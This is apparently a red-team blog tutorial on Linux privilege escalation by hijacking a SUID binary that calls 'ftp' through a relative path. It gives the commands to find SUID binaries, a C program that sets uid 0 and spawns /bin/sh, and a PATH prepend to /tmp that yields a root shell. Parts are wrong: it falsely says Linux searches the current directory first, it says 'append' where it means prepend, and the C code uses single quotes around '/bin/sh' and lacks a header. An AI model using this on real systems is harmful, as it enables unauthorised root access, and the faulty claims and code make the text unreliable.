Sudo Binary Relative Path - RedTeam Nation

Privilege Escalation: Sudo Binary Relative Path

Sudo Binary Relative Path:

There are times when you are looking for a SUID binary or one that already has sudo rights. You may come across a binary that you are not familiar with and may not have any online presense in the security community. In these cases you take look at the binary yourself to determine if you can do anything quick to escalate.

For this type of attack the binary must be calling another binary using a relative path and not an absolute one.

Relative:
ftp

Absolute:
/usr/bin/ftp

We can abuse this by building our own binary of ftp and having the SUID or Sudo binary execute ours instead of the expected one. This happens because of how Linux looks at relative paths.

When an application is called using a relative path the OS will first look in the same directory AKA pwd’s output. If it cannot find the binary here it will start going through the path in order. So if we append a new location such as /tmp to our PATH environment variable and place a binary called ftp there we can trick the SUID binary into executing our own.

First we will want to take a quick look for any SUID binary’s we can take a peak at.

find / -perm -4000 2>/dev/null

We see that there is one binary we may find interesting, /usr/bin/backup. Running this seems to throw an error but lets take a look with the strings application.

strings /usr/bin/backup

After looking through this output we can see the application seems to be calling ftp to ftp.example.com. It looks to be using a relative path instead of an absolute one, lets take advantage of this.

We are going to do this with our own binary or we can use a symlink to /bin/bash. In our example we will use a C application to give us a shell.

#include <unistd.h>
int main(void)
{
  setuid(0);
  setgid(0);
  system ('/bin/sh');
}

# Compile it
gcc ftp.c -o ftp

Now that we have this compiled in /tmp/ we must prepend our path that contains the new ftp binary to our PATH env variable.

export PATH=/tmp:$PATH

This will save the current path and prepend our new first path with the binary. When we run the executable backup we can see that we now have a root shell.